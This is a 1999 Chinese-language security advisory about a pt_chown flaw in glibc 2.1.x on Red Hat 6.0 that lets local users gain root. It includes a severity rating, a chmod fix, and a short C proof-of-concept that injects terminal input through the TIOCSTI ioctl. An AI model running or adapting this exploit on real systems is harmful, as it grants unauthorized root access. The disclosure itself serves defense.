Redhat6.0内含pt_chown允许非法用户取得ROOT权利发布时间:1999-08-21 更新时间:1999-08-21 严重程度:高 威胁程度:本地管理员权限 错误类型:意外情况处置错误 利用方式:服务器模式 受影响系统 Linux详细描述 Glibc2.1.x提供一个SUID程序叫pt_chown,这个程序也跟随Redhat6.0发行,它帮助为非SUID程序分配伪终端,但是其薄弱的安全机制允许用户非法获取root. 测试代码 Linux pt_chown Vulnerability int main(int a,char* b[]) { char* c="\nclear;echo huhuhu, it worked...;id;sleep 2\n"; int i=0,x=open(b[1],1); // Expect writable, allocated // (eg. by screen) /dev/ttyXX as 1st arg if (x<0) { perror(b[1]); exit(1); } if (!fork()) { dup2(x,3); execl("/usr/libexec/pt_chown","pt_chown",0); perror("pt_chown"); exit(1); } sleep(1); for (i;i<strlen(c);i++) ioctl(x,0x5412,&c[i]); } 解决方案 chmod 700 /usr/libexec/pt_chown 相关信息 |
